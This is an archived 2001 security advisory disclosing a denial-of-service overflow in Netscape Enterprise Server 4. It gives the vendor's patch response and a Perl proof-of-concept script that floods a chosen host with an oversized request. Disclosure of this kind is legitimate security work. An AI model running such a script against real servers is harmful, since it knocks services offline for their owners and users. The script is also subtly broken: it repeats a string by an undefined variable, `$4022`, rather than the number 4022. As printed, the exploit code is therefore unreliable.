Digizen Security Group advisory, 2001 Netscape Enterprise Server 4 Method and URI overflow Systems affected: Netscape Enterprise Server 4/SP7 (possibly 4/SP3-SP7) running on Windows NT and Win2k Risk: Denial of Service Date: 18 May 2001 Vendor Notified: 25 April 2001 Legal Notice: This Advisory is Copyright (c) 2001 Digizen Security Group and Roberto Cardona. You may distribute it unmodified. You may not modify it and distribute it or distribute parts of it without the author's written permission. Disclaimer: In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use of this information. Any use of this information is at the user's own risk. Description: By sending an invalid method or URI request of 4022 bytes Netscape Enterprise Server will stop responding to requests. Vendor Status: Netscape was informed and responded on the same business day. Vendor's Response: The security & stability of iPlanet's customer's environments is one of our paramount concerns. To ensure the stability of our customer's environments iPlanet has made available an NSAPI patch that can be applied to iPlanet Web Server, Enterprise Edition version 4.1 Service Packs 3 through 7. The NSAPI patch is available at http://www.iplanet.com/products/iplanet_web_enterprise/iwsalert5.11.html. This issue will also be addressed by the release of iPlanet Web Server, Enterprise Edition version 4.1 Service Pack 8. ---------------------------------------------------------------------------- ---------- #!/usr/bin/perl use IO::Socket; if (@ARGV < 2) { print "Usage: host port\n"; exit; } $overflow = "A" x $4022; &connect; sleep(15); &connect; exit; ################################################ sub connect() { $sock= IO::Socket::INET->new(Proto=>"TCP", PeerAddr=>$ARGV[0], PeerPort=>"$ARGV[1]",) or die "Cant connect to $ARGV[0]: $!\n"; $sock->autoflush(1); print $sock "$overflow /index.html HTTP/1.0\n\n"; $response=<$sock>; print "$response"; while(<$sock>){ print "$_\n"; } close $sock; }
This archive was generated by hypermail 2b30 : Sat May 19 2001 - 18:01:26 PDT